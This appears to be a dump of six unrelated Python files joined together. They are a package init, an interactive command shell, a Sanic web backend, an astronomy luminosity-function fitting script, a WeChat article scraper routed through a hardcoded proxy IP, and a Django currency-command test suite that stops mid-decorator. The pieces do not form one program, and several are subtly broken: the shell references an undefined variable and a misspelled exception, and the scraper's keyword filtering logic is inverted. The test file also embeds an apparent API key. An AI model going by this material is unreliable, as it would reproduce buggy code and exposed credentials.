PYTHON_MODULE_PATH = os.path.dirname(os.path.dirname(os.path.abspath(__file__)))
ROOT_PATH = os.path.dirname(PYTHON_MODULE_PATH)
from tools.td_tools import Teradata
from tools.json_tools import JsonConf
from tools.email_tools import EmailTools
from tools.td_odbc_tools import Teradata as TeradataOdbc
__all__ = ['Teradata', 'JsonConf', 'EmailTools', 'TeradataOdbc'] |
#!/usr/bin/env python
# -*- coding:utf-8 -*-
# Author: wxnacy@gmail.com
"""
"""
import sys
import os
import argparse
import shutil
import traceback
import pygments
from datetime import datetime
from pygments.token import Token
from pygments.lexers.python import PythonLexer
from prompt_toolkit.formatted_text import PygmentsTokens
from prompt_toolkit import print_formatted_text
from prompt_toolkit import PromptSession
from prompt_toolkit.application import run_in_terminal
from prompt_toolkit.history import FileHistory
from prompt_toolkit.auto_suggest import AutoSuggestFromHistory
from wpy.argument import CommandArgumentParser
from wpy.argument import CommandArgumentParserFactory
from .errors import ContinueError
from .errors import CommnadNotFoundError
class CommandShell():
parser_dict = {}
parser = None
_prompt_default = ''
session = None
HISTORY_PATH = os.path.expanduser('~/.wpy_history')
def __init__(self):
self.parser = self._get_parser()
self.session = PromptSession(
# completer=CommandCompleter(self.parser, client),
history = FileHistory(self.HISTORY_PATH),
auto_suggest = AutoSuggestFromHistory(),
complete_in_thread=True
)
def _get_parser(self, cmd=None):
if cmd not in self.parser_dict:
parser = CommandArgumentParserFactory.build_parser(cmd)
parser.set_prompt(self.session)
self.parser_dict[cmd] = parser
return self.parser_dict[cmd]
def run(self):
self._run_shell()
def get_left_prompt(self):
return 'wpy> '
def get_right_prompt(self):
return ''
def _run_shell(self):
while True:
try:
right_prompt = ''
text = self.session.prompt(
self.get_left_prompt(),
default = self._prompt_default,
rprompt = self.get_right_prompt(),
)
self._run_once_time(text)
except ContinueError:
continue
except CommnadNotFoundError:
print('command not found: {}'.format(text))
except KeyboardInterrupt:
continue
except EOFError:
break
except Exception as e:
self._print('ERROR: ' + str(e))
self._end_run()
# print('GoodBye!')
def _end_run(self):
self._prompt_default = ''
def _run_once_time(self, text):
"""运行"""
if not text:
return
# parser = self._get_parser()
# args = parser.parse_args(text)
# cmd = args.cmd
self.parser = self._get_parser(text)
self._run_base_cmd(text)
if isinstance(self.parser, CommandArgumentParser):
self.parser.run(text)
return
if not hasattr(self, '_' + cmd):
raise CommnadNotFoundException()
func = getattr(self, '_' + cmd)
func(text)
def _run_base_cmd(self, text):
"""运行基础命令"""
if text.startswith('!'):
text = text[1:]
try:
history_num = int(text)
cmd = self.get_history_by_num(history_num)
# def _print_cmd():
# print(cmd)
# run_in_terminal(_print_cmd)
self._prompt_default = cmd
except:
raise CommnadNotFoundError()
else:
raise ContinueError()
def _exit(self, text):
raise EOFError()
def get_history_by_num(self, num):
"""获取历史命令"""
items = self.session.history.get_strings()
if len(items) < num:
return None
return items[num - 1]
def _print(self, text):
tokens = list(pygments.lex(text, lexer=PythonLexer()))
print_formatted_text(PygmentsTokens(tokens), end='')
|
from sanic import Sanic
import os
import asyncio
import logging
from sanic.request import Request
from sanic import response, HTTPResponse, Blueprint
from sanic.exceptions import SanicException
import httpx
from typing import Optional, Any
from . import get_cur_user
from ..logic import Worker
from ..state import User
from .. import utils
from .. import secret
OAUTH_HTTP_TIMEOUT = 20
utils.fix_zmq_asyncio_windows()
app = Sanic('guiding-star-backend')
app.config.DEBUG = False
app.config.OAS = False
app.config.KEEP_ALIVE_TIMEOUT = 15
app.config.REQUEST_MAX_SIZE = 1024*1024*(1+secret.WRITEUP_MAX_SIZE_MB)
app.ext.add_dependency(Worker, lambda req: req.app.ctx.worker)
app.ext.add_dependency(httpx.AsyncClient, lambda req: req.app.ctx.oauth_http_client)
app.ext.add_dependency(Optional[User], get_cur_user)
@app.before_server_start
async def setup_game_state(cur_app: Sanic, _loop: Any) -> None:
logging.getLogger('sanic.root').setLevel(logging.INFO)
worker = Worker(cur_app.config.get('WORKER_NAME', f'worker-{os.getpid()}'), receiving_messages=True)
cur_app.ctx.worker = worker
await worker._before_run()
cur_app.ctx._worker_task = asyncio.create_task(worker._mainloop())
cur_app.ctx.oauth_http_client = httpx.AsyncClient( # type: ignore
http2=True,
proxies=secret.OAUTH_HTTP_PROXIES,
timeout=OAUTH_HTTP_TIMEOUT,
)
async def handle_error(req: Request, exc: Exception) -> HTTPResponse:
if isinstance(exc, SanicException):
raise exc
try:
user = get_cur_user(req)
debug_info = f'{req.id} {req.uri_template} U#{"--" if user is None else user._store.id}'
except Exception as e:
debug_info = f'no debug info, {repr(e)}'
req.app.ctx.worker.log('error', 'app.handle_error', f'exception in request ({debug_info}): {utils.get_traceback(exc)}')
return response.html(
'<!doctype html>'
'<h1>🤡 500 — Internal Server Error</h1>'
'<p>This accident is recorded.</p>'
f'<p>If you believe there is a bug, tell admin about this request ID: {req.id}</p>'
'<br>'
'<p>😭 <i>Project Guiding Star</i></p>',
status=500
)
app.error_handler.add(Exception, handle_error)
from .endpoint import auth
from .endpoint import wish
from .endpoint import template
from .endpoint import ws
svc = Blueprint.group(auth.bp, wish.bp, template.bp, ws.bp, url_prefix='/service')
app.blueprint(svc)
def start(idx0: int, worker_name: str) -> None:
app.config.WORKER_NAME = worker_name
app.run(**secret.WORKER_API_SERVER_KWARGS(idx0), workers=1) # type: ignore |
import sys
import argparse as ap
import numpy as np
import os.path as op
import logging
from astropy.table import Table
from lumfuncmcmc import LumFuncMCMC
import VmaxLumFunc as V
from scipy.optimize import fsolve
import configLF
from distutils.dir_util import mkpath
def setup_logging():
'''Setup Logging for LumFuncMCMC, which allows us to track status of calls and
when errors/warnings occur.
Returns
-------
log : class
log.info() is for general print and log.error() is for raise cases
'''
log = logging.getLogger('lumfuncmcmc')
if not len(log.handlers):
# Set format for logger
fmt = '[%(levelname)s - %(asctime)s] %(message)s'
fmt = logging.Formatter(fmt)
# Set level of logging
level = logging.INFO
# Set handler for logging
handler = logging.StreamHandler()
handler.setFormatter(fmt)
handler.setLevel(level)
# Build log with name, mcsed
log = logging.getLogger('lumfuncmcmc')
log.setLevel(logging.DEBUG)
log.addHandler(handler)
return log
def parse_args(argv=None):
'''Parse arguments from commandline or a manually passed list
Parameters
----------
argv : list
list of strings such as ['-f', 'input_file.txt', '-s', 'default.ssp']
Returns
-------
args : class
args class has attributes of each input, i.e., args.filename
as well as astributes from the config file
'''
parser = ap.ArgumentParser(description="LumFuncMCMC",
formatter_class=ap.RawTextHelpFormatter)
parser.add_argument("-f", "--filename",
help='''File to be read for galaxy data''',
type=str, default=None)
parser.add_argument("-o", "--output_filename",
help='''Output filename for given run''',
type=str, default='test.dat')
parser.add_argument("-nw", "--nwalkers",
help='''Number of walkers for EMCEE''',
type=int, default=None)
parser.add_argument("-ns", "--nsteps",
help='''Number of steps for EMCEE''',
type=int, default=None)
parser.add_argument("-nbins", "--nbins",
help='''Number of bins for evaluating
true measured luminosity function from V_eff method''',
type=int, default=None)
parser.add_argument("-nboot", "--nboot",
help='''Number of bootstrap iterations for V_eff method''',
type=int, default=None)
parser.add_argument("-o0", "--Omega_0",
help='''Effective survey area in square arcseconds''',
type=float, default=None)
parser.add_argument("-mcf", "--min_comp_frac",
help='''Minimum completeness fraction considered''',
type=float, default=None)
parser.add_argument("-al", "--alpha",
help='''Minimum completeness fraction considered''',
type=float, default=None)
parser.add_argument("-fl", "--Flim",
help='''Minimum completeness fraction considered''',
type=float, default=None)
parser.add_argument("-ln", "--line_name",
help='''Name of line or band for LF measurement''',
type=str, default=None)
# Initialize arguments and log
args = parser.parse_args(args=argv)
args.log = setup_logging()
# Use config values if none are set in the input
arg_inputs = ['nwalkers','nsteps','nbins','nboot','Flim','alpha','line_name','line_plot_name','Omega_0','sch_al','sch_al_lims','Lstar','Lstar_lims','phistar','phistar_lims','Lc','Lh',
'min_comp_frac', 'param_percentiles', 'output_dict']
for arg_i in arg_inputs:
try:
if getattr(args, arg_i) in [None, 0]:
setattr(args, arg_i, getattr(configLF, arg_i))
except AttributeError:
setattr(args, arg_i, getattr(configLF, arg_i))
if args.line_name=='OIII':
args.line_plot_name = r'[OIII] $\lambda 5007$'
if args.line_name=='Ha':
args.line_plot_name = r'${\rm{H\alpha}}$'
return args
def read_input_file(args):
""" Function to read in input ascii file with properly named columns.
Columns should include redshifts (header 'z') and a (linear) flux (header
'LineorBandName_flux') in 1.0e-17 erg/cm^2/s or log luminosity (header
'LineorBandName_lum') in log erg/s. Errors can be included with headers
'LineorBandName_flux_e' or 'LineorBandName_lum_e', with the same units.
Input
-----
args : class
The args class is carried from function to function with information
from command line input and config.py
Return
------
z: Numpy 1-D Array
Source redshifts
flux: Numpy 1-D Array
Source fluxes (1.0e-17 erg/cm^2/s or None if not in input file)
flux_e: Numpy 1-D Array
Source flux errors (1.0e-17 erg/cm^2/s or None if not in input file)
lum: Numpy 1-D Array
Source log luminosities (log erg/s or None if not in input file)
lum_e: Numpy 1-D Array
Source log luminosity errors (log erg/s or oNone if not in input file)
root: Float
Minimum flux cutoff based on the completeness curve parameters and desired minimum completeness
"""
datfile = Table.read(args.filename,format='ascii')
z = datfile['z']
if abs(args.min_comp_frac-0.0)<1.0e-6:
root = 0.0
else:
root = fsolve(lambda x: V.p(x,args.Flim,args.alpha)-args.min_comp_frac,[args.Flim])[0]
try:
flux = datfile['%s_flux'%(args.line_name)]
if max(flux)>1.0e-5:
cond = flux>1.0e17*root
else:
cond = flux>root
flux_e = datfile['%s_flux_e'%(args.line_name)]
flux, flux_e = flux[cond], flux_e[cond]
except:
flux, flux_e = None, None
if '%s_lum'%(args.line_name) in datfile.columns:
lum = datfile['%s_lum'%(args.line_name)]
DL = np.zeros(len(z))
for i,zi in enumerate(z):
DL[i] = V.dLz(zi)
lumflux = 10**lum/(4.0*np.pi*(DL*3.086e24)**2)
cond = lumflux>root
lum = lum[cond]
if '%s_lum_e'%(args.line_name) in datfile.columns:
lum_e = datfile['%s_lum'%(args.line_name)][cond]
else:
lum_e = None
else:
lum, lum_e = None, None
z = z[cond]
return z, flux, flux_e, lum, lum_e, root
def main(argv=None):
""" Read input file, run luminosity function routine, and create the appropriate output """
# Make output folder if it doesn't exist
mkpath('LFMCMCOut')
# Get Inputs
if argv == None:
argv = sys.argv
argv.remove('run_lumfuncmcmc.py')
args = parse_args(argv)
# Read input file into arrays
z, flux, flux_e, lum, lum_e, root = read_input_file(args)
print "Read Input File"
# Initialize LumFuncMCMC class
LFmod = LumFuncMCMC(z, flux=flux, flux_e=flux_e, lum=lum, lum_e=lum_e,
Flim=args.Flim, alpha=args.alpha, line_name=args.line_name,
line_plot_name=args.line_plot_name, Omega_0=args.Omega_0,
nbins=args.nbins, nboot=args.nboot, sch_al=args.sch_al,
sch_al_lims=args.sch_al_lims, Lstar=args.Lstar,
Lstar_lims=args.Lstar_lims, phistar=args.phistar,
phistar_lims=args.phistar_lims, Lc=args.Lc, Lh=args.Lh,
nwalkers=args.nwalkers, nsteps=args.nsteps, root=root)
print "Initialized LumFuncMCMC class"
# Build names for parameters and labels for table
names = LFmod.get_param_names()
percentiles = args.param_percentiles
labels = ['Line']
for name in names:
labels = labels + [name + '_%02d' % per for per in percentiles]
formats = {}
for label in labels:
formats[label] = '%0.3f'
formats['Line'] = '%s'
LFmod.table = Table(names=labels, dtype=['S10'] +
['f8']*(len(labels)-1))
print "Finished making names and labels for LF table and about to start fitting the model!"
#### Run the actual model!!! ####
LFmod.fit_model()
print "Finished fitting model and about to create outputs"
#### Get desired outputs ####
if args.output_dict['triangle plot']:
LFmod.triangle_plot('LFMCMCOut/triangle_%s_nb%d_nw%d_ns%d_mcf%d' % (args.output_filename.split('.')[0], args.nbins, args.nwalkers, args.nsteps, int(100*args.min_comp_frac)), imgtype = args.output_dict['image format'])
print "Finished making Triangle Plot with Best-fit LF (and V_eff-method-based data)"
else:
LFmod.set_median_fit()
print "Finished setting median fit and V_eff parameters"
names.append('Ln Prob')
if args.output_dict['fitposterior']:
T = Table(LFmod.samples, names=names)
T.write('LFMCMCOut/fitposterior_%s_nb%d_nw%d_ns%d_mcf%d.dat' % (args.output_filename.split('.')[0], args.nbins, args.nwalkers, args.nsteps, int(100*args.min_comp_frac)),
overwrite=True, format='ascii.fixed_width_two_line')
print "Finished writing fitposterior file"
if args.output_dict['bestfitLF']:
T = Table([LFmod.lum, LFmod.lum_e, LFmod.medianLF],
names=['Luminosity', 'Luminosity_Err', 'MedianLF'])
T.write('LFMCMCOut/bestfitLF_%s_nb%d_nw%d_ns%d_mcf%d.dat' % (args.output_filename.split('.')[0], args.nbins, args.nwalkers, args.nsteps, int(100*args.min_comp_frac)),
overwrite=True, format='ascii.fixed_width_two_line')
print "Finished writing bestfitLF file"
if args.output_dict['VeffLF']:
T = Table([LFmod.Lavg, LFmod.lfbinorig, np.sqrt(LFmod.var)],
names=['Luminosity', 'BinLF', 'BinLFErr'])
T.write('LFMCMCOut/VeffLF_%s_nb%d_nw%d_ns%d_mcf%d.dat' % (args.output_filename.split('.')[0], args.nbins, args.nwalkers, args.nsteps, int(100*args.min_comp_frac)),
overwrite=True, format='ascii.fixed_width_two_line')
print "Finished writing VeffLF file"
LFmod.table.add_row([args.line_name] + [0.]*(len(labels)-1))
LFmod.add_fitinfo_to_table(percentiles)
print(LFmod.table)
if args.output_dict['parameters']:
LFmod.table.write('LFMCMCOut/%s' % args.output_filename,
format='ascii.fixed_width_two_line',
formats=formats, overwrite=True)
print "Finished writing LF main table"
if args.output_dict['settings']:
filename = open('LFMCMCOut/%s.args' % args.output_filename, 'w')
del args.log
filename.write( str( vars(args) ) )
filename.close()
print "Finished writing settings to file"
if __name__ == '__main__':
main() |
#coding:utf-8
#------requirement------
#lxml-3.2.1
#numpy-1.15.2
#------requirement------
import sys
reload(sys)
sys.setdefaultencoding('utf8')
from lxml import etree
import re
import datetime
import urlparse
import gc
sys.path.append("/home/dev/Repository/news/Tegenaria/tSpider/tSpider/")
from browserRequest_weixin import BrowserRequest
from settings import Settings
from middlewares.fileIOMiddleware import FileIOMiddleware
from middlewares.doraemonMiddleware import Doraemon
from middlewares.requestsMiddleware import RequestsMiddleware
class Weixin():
def __init__(self):
self.settings = Settings()
self.getSettings()
self.file = FileIOMiddleware()
self.request = RequestsMiddleware()
self.doraemon = Doraemon()
self.doraemon.createFilePath(self.work_path_prd2)
self.doraemon.createFilePath(self.log_path)
def getSettings(self):
settings_name = self.settings.CreateSettings('weixin')
self.source = settings_name['SOURCE_NAME']
self.work_path_prd2 = settings_name['WORK_PATH_PRD2']
self.mongo = settings_name['MONGO_URLS']
self.name = settings_name['NAME']
self.max_pool_size = settings_name['MAX_POOL_SIZE']
self.log_path = self.settings.LOG_PATH_PRD2
self.urls = settings_name['URLS']
self.restart_path = settings_name['RESTART_PATH']
self.restart_interval = settings_name['RESTART_INTERVAL']
self.today = self.settings.TODAY
self.regx = re.compile("/s\?timestamp=[0-9]{0,}&src=[0-9]{0,}&ver=[0-9]{0,}&signature=(.*?)")
def parse(self, response):
if len(response['response']) == 0:
print 'ip is blocked'
return
current_url = response['response'].current_url.encode('gbk')
weixinId = response['request_title'].encode('gbk')
print 'Start to parse: {0}'.format(current_url)
html = etree.HTML(response['response'].page_source)
href_items = html.xpath(".//*[contains(@class,'weui_media_bd')]")
for item in href_items:
href = item.xpath(".//*[contains(@class,'weui_media_title')]/@hrefs")
if len(href) == 0:
print 'Url is empty'
return
valid = True
if len(href) == 0:
continue
href_url = href[0]
isValidUrl = self.regx.match(href_url)
if isValidUrl is None:
print 'Invalid url for not match: {0}'.format(href_url)
continue
for good in self.goodkeys:
if valid == True:
continue
if good in href_url:
valid = True
for bad in self.badkeys:
if valid == False:
continue
if bad in href_url:
valid = False
if valid:
short_url_parts = re.split(r'signature=', href_url)
id = ''.join(short_url_parts[1]).strip()
p_time = item.xpath(".//*[contains(@class,'weui_media_extra_info')]/text()")
url = urlparse.urljoin(current_url, href_url)
is_p_time_missing = False
if self.doraemon.isEmpty(str(p_time)):
is_p_time_missing = True
self.file.logger(self.log_path, 'publish time missing for {0}'.format(current_url))
p_time = int(short_url_parts[short_url_parts.index('timestamp') + 1])
p_time = datetime.datetime.fromtimestamp(p_time).strftime("%Y-%m-%d")
p_time = ''.join(p_time).strip()
publish_time = self.doraemon.getDateFromString(p_time)
title = item.xpath(".//*[contains(@class,'weui_media_title')]/text()")
title = ''.join(title).strip()
is_title_empty = self.doraemon.isEmpty(title)
if (is_title_empty is False) and (self.doraemon.isDuplicated(self.doraemon.bf_weixin_url, title) is False):
if self.doraemon.isFinished(self.doraemon.bf_weixin_id, weixinId) is False and is_p_time_missing is False and publish_time == self.today:
self.doraemon.storeFinished(self.doraemon.bf_weixin_id, weixinId)
data = {
'title': title,
'url': url,
'id': id,
'download_time': self.today,
'publish_time': publish_time,
'source': self.source
}
self.file.logger(self.log_path, 'Start to store mongo {0}'.format(data['url']))
print 'Start to store mongo {0}'.format(data['url'])
self.doraemon.storeMongodb(self.mongo, data)
self.file.logger(self.log_path, 'End to store mongo {0}'.format(data['url']))
print 'End to store mongo {0}'.format(data['url'])
self.file.logger(self.log_path, 'Done for {0}'.format(url))
else:
if is_title_empty is True:
self.file.logger(self.log_path, 'Empty title for {0}'.format(url))
print 'Empty title for {0}'.format(url)
print 'Finished or Empty title for {0}'.format(url)
else:
self.file.logger(self.log_path, 'Invalid {0}'.format(current_url))
print 'Invalid {0}'.format(current_url)
print 'End to parse {0}'.format(current_url)
del current_url, html, title, url, id, data, short_url_parts
gc.collect()
def start_requests(self):
if self.doraemon.isExceedRestartInterval(self.restart_path, self.restart_interval) is False:
return
self.file.logger(self.log_path, 'Start {0} requests'.format(self.name))
print 'Start {0} requests'.format(self.name)
self.badkeys = []
self.goodkeys = []
new_urls = []
content = self.file.readFromTxt(self.urls)
id_list = content.strip().split('\n')
for id in id_list:
if self.doraemon.isEmpty(id) is False and self.doraemon.isFinished(self.doraemon.bf_weixin_id, id) is False:
new_urls.append([id, id])
if len(new_urls) == 0:
print 'No url.'
return
self.file.logger(self.log_path, 'There is {0} weixin requests to do.'.format(str(len(new_urls))))
request = BrowserRequest()
content = request.start_chrome(new_urls, self.max_pool_size, self.log_path, '121.234.244.59:30101', callback=self.parse)
self.file.logger(self.log_path, 'End for {0} requests of {1}.'.format(str(len(content)), self.name))
print 'End for {0} requests of {1}.'.format(str(len(content)), self.name)
del new_urls, content, id_list, request
gc.collect()
if __name__ == '__main__':
Weixin=Weixin()
Weixin.start_requests() |
# -*- coding: utf-8 -*-
"""
Various test cases for the `currencies` and `updatecurrencies` management commands
"""
from __future__ import unicode_literals
import re, os, sys
from decimal import Decimal
from datetime import datetime, timedelta
from functools import wraps
if sys.version_info.major >= 3:
from unittest.mock import patch, MagicMock
else:
from mock import patch, MagicMock
from django import template
from django.test import TestCase, override_settings
from django.core.management import call_command
from django.core.exceptions import ImproperlyConfigured
from six import StringIO
from currencies.models import Currency
from currencies.utils import calculate
cwd = os.path.abspath(os.path.dirname(__file__))
default_settings = {
"OPENEXCHANGERATES_APP_ID": "c2b2efcb306e075d9c2f2d0b614119ea",
}
def fromisoformat(s):
"""
Hacky way to recover a datetime from an isoformat() string
Python 3.7 implements datetime.fromisoformat() which is the proper way
There are many other 3rd party modules out there, but should be good enough for testing
"""
return datetime(*map(int, re.findall('\d+', s)))
# Mock get requests instead of hammering the API's
def mock_requestget_response(filename):
"Returns a mock get response with the contents of a file"
# Cache the file content to guard against reading from & writing to the same file
with open(filename, 'rb') as fp:
_content = fp.read()
def mock_resp_json(*args, **kwargs):
import json
# Supply a default encoding for python 2.7
return json.loads(_content.decode('utf-8'), *args, **kwargs)
mockget = MagicMock()
resp = mockget.return_value
resp.raise_for_status.return_value = None
resp.json.side_effect = mock_resp_json
resp.content = _content
return mockget
# Mock helper function for oxr rates support without a valid API key for testing
def mock_requestsession_getjson(filename):
"Sets up the mock session instance to return a fixed json rates file"
mocksess = MagicMock()
sessInst = mocksess.return_value
sessInst.get = mock_requestget_response(filename)
return mocksess
# Mock request exception helpers for simulating connectivity problems
def mock_requestget_exception():
"Sets up the mock get instance to raise a Request exception"
from requests.exceptions import RequestException
mockget = MagicMock()
mockget.side_effect = RequestException('Mocked Exception')
return mockget
def mock_requestsession_getexception():
"Sets up the mock session instance to raise a Request exception"
mocksess = MagicMock()
sessInst = mocksess.return_value
sessInst.get = mock_requestget_exception()
return mocksess
# Mock the source APIs for the main tests for speed and to prevent hammering & DoS protection
# We don't mock yahoo because it's already down
@patch('currencies.management.commands._currencyiso.get',
mock_requestget_response(
os.path.join(os.path.dirname(cwd), 'management', 'commands', '_currencyiso.xml')))
@patch('currencies.management.commands._openexchangerates_client.requests.Session',
mock_requestsession_getjson(
os.path.join(os.path.dirname(cwd), 'management', 'commands', '_openexchangerates.json')))
class BaseTestMixin(object):
"""
Test suite for minimal source functionality:
Currencies - code & name
Symbols - inherited by base handler taken from static file currencies.json
No cache file
No info
No rate updates - factor
Tests for functionality can be overridden with the included mixins
"""
source_arg = ()
_code_0dp = 'JPY'
_symb_0dp = '¥'
_name_0dp = 'Yen'
_code_2dp = 'GBP'
_symb_2dp = '£'
_name_2dp = 'Pound'
_code_3dp = 'KWD'
_symb_3dp = 'د.ك'
_name_3dp = 'Dinar'
_newcodes = [_code_0dp, _code_2dp, _code_3dp]
_newsymbs = [_symb_0dp, _symb_2dp, _symb_3dp]
_newnames = [_name_0dp, _name_2dp, _name_3dp]
_code_exist = 'USD'
_symb_exist = '$'
_name_exist = 'Dollar'
_code_base = 'EUR'
_symb_base = '€'
_name_base = 'Euro'
_now_delta = timedelta(seconds=1)
_min_info = ['Created', 'Modified']
def run_cmd_verify_stdout(self, min_lines, cmd, *args, **kwargs):
"Runs the given command with full verbosity and checks there are output strings"
args = self.source_arg + args
kwargs.setdefault('verbosity', 3)
buf = StringIO()
call_command(cmd, stdout=buf, stderr=buf, *args, **kwargs)
output = buf.getvalue().splitlines()
buf.close()
self.assertGreaterEqual(len(output), min_lines)
return output
def default_currency_cmd(self):
"Single currency import that is reused for a lot of basic tests"
return self.run_cmd_verify_stdout(2, 'currencies', '-i=' + self._code_2dp)
def import_all(self):
return self.run_cmd_verify_stdout(20, 'currencies')
def import_one(self):
return self.run_cmd_verify_stdout(2, 'currencies')
def default_rate_cmd(self):
"Rate update command that is reused for a lot of basic tests. Uses the base from the db"
return self.run_cmd_verify_stdout(3, 'updatecurrencies')
def _verify_stdout_msg(msglist):
"Ensure one of the messages is in the command stdout"
def decorator(func):
@wraps(func)
def wrapper(inst, *args, **kwargs):
lines = func(inst, *args, **kwargs)
output = '\n'.join(lines)
match = False
for msg in msglist:
if msg in output:
match = True
break
inst.assertIs(match, True)
return lines
return wrapper
return decorator
def _verify_new_currencies(func):
"""
Wrapper for testing commands that add new currencies
Django 1.11 introduced queryset difference(). This would be a better way to implement this wrapper
but currently we're supporting 1.8
"""
@wraps(func)
def wrapper(inst, *args, **kwargs):
before_qs = Currency.objects.all()
before_rows = len(before_qs)
before_codes = set(record.code for record in before_qs)
runtime = datetime.now()
# The command that creates the currencies
ret = func(inst, *args, **kwargs)
after_qs = Currency.objects.all()
after_rows = len(after_qs)
after_codes = set(record.code for record in after_qs)
new_codes = after_codes - before_codes
# There are some new entries
inst.assertGreater(len(new_codes), 0)
for code in new_codes:
record = after_qs.get(code=code)
# There is a name on each entry
inst.assertTrue(record.name)
# Some common codes have symbols
if code in inst._newcodes:
inst.assertTrue(record.symbol)
# `Created` and `Modified` dates are approx now()
inst.assertAlmostEqual(runtime, fromisoformat(record.info['Created']), delta=inst._now_delta)
inst.assertAlmostEqual(runtime, fromisoformat(record.info['Modified']), delta=inst._now_delta)
return ret
return wrapper
def _verify_new_currencylist(currency_list):
"Wrapper for testing a specific list of currencies"
def decorator(func):
@wraps(func)
def wrapper(inst, *args, **kwargs):
qs = Currency.objects.all()
for code in currency_list:
inst.assertRaises(Currency.DoesNotExist, qs.get, code=code)
ret = func(inst, *args, **kwargs)
qs = Currency.objects.all()
for code in currency_list:
inst.assertIs(qs.filter(code=code).exists(), True)
return ret
return wrapper
return decorator
def _verify_new_names(func):
"Wrapper for checking new currencies get a sensible name"
@wraps(func)
def wrapper(inst, *args, **kwargs):
ret = func(inst, *args, **kwargs)
names = zip(inst._newcodes, inst._newnames)
qs = Currency.objects.all()
for code, name in names:
inst.assertRegexpMatches(qs.get(code=code).name, name)
return ret
return wrapper
def _verify_new_symbols(func):
"Wrapper for checking some new symbols have been populated"
@wraps(func)
def wrapper(inst, *args, **kwargs):
ret = func(inst, *args, **kwargs)
symbs = zip(inst._newcodes, inst._newsymbs)
qs = Currency.objects.all()
for code, symb in symbs:
inst.assertEqual(qs.get(code=code).symbol, symb)
return ret
return wrapper
def _verify_no_info(func):
"Wrapper for checking info is minimal on new imports"
@wraps(func)
def wrapper(inst, *args, **kwargs):
ret = func(inst, *args, **kwargs)
qs = Currency.objects.all()
for code in inst._newcodes:
inst.assertEqual(sorted(list(qs.get(code=code).info.keys())), inst._min_info)
return ret
return wrapper
### TESTS FOR SOURCES THAT SUPPORT IMPORTING NEW CURRENCIES ###
## POSITIVE Tests ##
@_verify_new_currencies
def test_import_all_currencies_bydefault(self):
"Currencies: No parameters imports all currencies"
self.import_all()
@_verify_new_currencies
def test_import_all_currencies_byemptysetting(self):
"Currencies: Empty CURRENCIES setting imports all currencies"
with self.settings(CURRENCIES=[]):
self.import_all()
@_verify_new_currencylist([_code_0dp])
@_verify_new_currencies
def test_import_variable_CURRENCIES(self):
"Currencies: CURRENCIES setting works"
with self.settings(CURRENCIES=[self._code_0dp]):
self.import_one()
@_verify_new_currencylist([_code_2dp])
@_verify_new_currencies
def test_import_variable_SHOP_CURRENCIES(self):
"Currencies: SHOP_CURRENCIES setting works"
with self.settings(SHOP_CURRENCIES=[self._code_2dp]):
self.import_one()
@_verify_new_currencylist([_code_0dp])
@_verify_new_currencies
def test_import_variable_BOTH(self):
"Currencies: CURRENCIES setting is given priority"
with self.settings(SHOP_CURRENCIES=[self._code_2dp], CURRENCIES=[self._code_0dp]):
self.import_one()
self.assertRaises(Currency.DoesNotExist, Currency.objects.get, code=self._code_2dp)
@_verify_new_currencylist([_code_3dp])
@_verify_new_currencies
def test_import_variable_WIBBLE(self):
"Currencies: Custom setting works"
with self.settings(WIBBLE=[self._code_3dp]):
self.run_cmd_verify_stdout(2, 'currencies', '--import=WIBBLE')
@_verify_new_currencylist([_code_0dp])
@_verify_new_currencies
def test_import_single_currency_long(self):
"Currencies: Long import syntax"
self.run_cmd_verify_stdout(2, 'currencies', '--import=' + self._code_0dp)
@_verify_new_currencylist([_code_2dp])
@_verify_new_currencies
def test_import_single_currency_short(self):
"Currencies: Short import syntax"
self.default_currency_cmd()
@_verify_new_symbols
@_verify_new_names
@_verify_new_currencylist(_newcodes)
@_verify_new_currencies
def test_import_single_currencies_mix(self):
"Currencies: Mix of import syntax. Also names and symbols are populated"
self.run_cmd_verify_stdout(3, 'currencies',
'--import=' + self._code_3dp, '-i=' + self._code_2dp, '-i=' + self._code_0dp)
def test_skip_existing_currency(self):
"Currencies: Skip existing currency"
before = Currency.objects.get(code=self._code_exist)
self.run_cmd_verify_stdout(2, 'currencies', '-i=' + self._code_exist)
after = Currency.objects.get(code=self._code_exist)
self.assertEqual(before.name, after.name)
self.assertEqual(before.symbol, after.symbol)
self.assertEqual(before.factor, after.factor)
self.assertEqual(before.info, after.info)
def test_force_existing_currency(self):
"Currencies: Overwrite existing currency"
before = Currency.objects.get(code=self._code_exist)
runtime = datetime.now()
self.run_cmd_verify_stdout(2, 'currencies', '--force', '-i=' + self._code_exist)
after = Currency.objects.get(code=self._code_exist)
self.assertNotEqual(before.info, after.info)
self.assertAlmostEqual(runtime, fromisoformat(after.info['Modified']), delta=self._now_delta)
# Test overridden in IncInfoMixin
@_verify_no_info
def test_info(self):
"Currencies: only minimal info captured"
self.import_all()
# Test overridden in IncRatesMixin
@_verify_stdout_msg(['source does not provide currency rate information', 'Deprecated'])
def test_update_rates(self):
"Rates: not supported"
return self.default_rate_cmd()
## NEGATIVE Tests ##
# This test is overridden in IncCacheMixin
def test_no_connectivity(self):
"Currencies: Simulate connection problem"
with patch('currencies.management.commands._openexchangerates_client.requests.Session',
mock_requestsession_getexception()):
self.assertRaises(Exception, self.default_currency_cmd)
def test_import_invalid_variable(self):
"Currencies: Invalid import options"
with self.assertRaises(AttributeError):
self.run_cmd_verify_stdout(2, 'currencies', '--import=WIBBLE')
with self.assertRaises(ImproperlyConfigured):
self.run_cmd_verify_stdout(2, 'currencies', '-i=')
with self.assertRaises(ImproperlyConfigured):
self.run_cmd_verify_stdout(2, 'currencies', '-i=AB')
with self.assertRaises(ImproperlyConfigured):
self.run_cmd_verify_stdout(2, 'currencies', '-i=gbp')
with self.assertRaises(ImproperlyConfigured):
self.run_cmd_verify_stdout(2, 'currencies', '--import=ZZZ')
class IncCacheMixin(object):
"For source handlers that cache their currencies"
def _move_cache_file(modulename):
"Wrapper for testing the currency cache file. Keeps the newest file with size>0"
def decorator(func):
@wraps(func)
def wrapper(inst, *args, **kwargs):
from importlib import import_module
from random import randint
module = import_module(modulename)
modfile = module.CurrencyHandler._cached_currency_file
orgfile = os.path.join(os.path.dirname(modfile), str(randint(100000, 999999)) + '.tmp')
os.rename(modfile, orgfile)
ret = func(inst, *args, **kwargs)
try:
modfileinfo = os.stat(modfile)
except Exception:
os.rename(orgfile, modfile)
else:
if modfileinfo.st_size > 0 and modfileinfo.st_mtime > os.stat(orgfile).st_mtime:
os.remove(orgfile)
else:
os.remove(modfile)
os.rename(orgfile, modfile)
return ret
return wrapper
return decorator
@patch('currencies.management.commands._currencyiso.CurrencyHandler.endpoint', 'http://www.google.com/test.xml')
